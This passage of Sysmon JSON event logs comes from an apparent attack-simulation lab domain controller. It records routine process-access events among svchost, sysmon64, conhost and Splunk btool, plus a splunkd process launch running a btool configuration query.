\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2026,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:27.549\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:27.549","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2027,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:27.549\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:27.549","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2028,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:27.549\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:27.549","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2029,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:27.549\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:27.549","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2030,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:27.549\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:27.549","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2031,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:27.549\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:27.549","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2032,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:27.549\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:27.549","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2033,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:27.549\r\nSourceProcessGUID: {41C8662E-1F74-5F25-0000-0010C4650300}\r\nSourceProcessId: 3884\r\nSourceThreadId: 3904\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1F77-5F25-0000-0010B1E90300}\r\nTargetProcessId: 3240\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:27.549","SourceProcessGUID":"{41C8662E-1F74-5F25-0000-0010C4650300}","SourceProcessId":"3884","SourceThreadId":"3904","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1F77-5F25-0000-0010B1E90300}","TargetProcessId":"3240","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2034,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:27.563\r\nProcessGuid: {41C8662E-1F77-5F25-0000-001072EA0300}\r\nProcessId: 3956\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nFileVersion: 8.0.2\r\nDescription: splunkd service\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunkd.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool server list replication_port 